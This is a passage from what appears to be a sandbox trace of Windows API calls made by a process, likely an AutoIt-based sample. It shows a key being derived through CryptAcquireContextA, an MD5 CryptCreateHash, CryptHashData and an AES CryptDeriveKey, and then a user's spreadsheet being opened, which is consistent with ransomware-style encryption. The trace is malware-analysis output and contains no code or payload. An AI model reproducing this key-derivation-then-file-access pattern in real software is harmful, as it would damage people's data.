wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.473] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.473] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.473] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.473] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0034.473] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0034.473] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.473] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.473] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.474] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0034.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.474] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0034.475] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.475] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.475] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0034.475] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.475] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0034.475] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0034.475] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0034.475] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.475] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0034.475] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.476] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0034.476] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.476] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.476] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.476] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.476] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0034.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.476] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.476] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.476] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.476] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.476] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.476] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.476] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0034.476] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.476] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.476] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.476] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.477] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.477] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.477] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.477] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0034.477] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.477] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0034.477] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0034.477] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.477] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.477] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0034.477] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.477] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.478] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0034.478] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.478] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.478] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0034.478] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.478] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.479] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0034.479] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.479] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.479] CryptHashData (hHash=0x7c2240, pbData=0x7c97c8, dwDataLen=0x100, dwFlags=0x1) returned 1 [0034.480] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.480] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0034.480] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.480] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0034.480] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.480] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0034.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0034.480] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.480] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0034.480] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.480] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0034.480] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.480] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.480] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.480] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0034.480] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0034.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.480] CryptDestroyHash (hHash=0x7c2240) returned 1 [0034.481] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.481] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.481] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0034.481] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0034.481] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.481] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\2ku7the4lqt.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.481] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.481] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0034.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0034.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0034.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0034.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.481] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0034.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0034.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0034.481] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0034.481] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0034.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0034.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0034.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0034.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0034.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c97c8 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0034.483] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791268 [0034.483] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c97c8 | 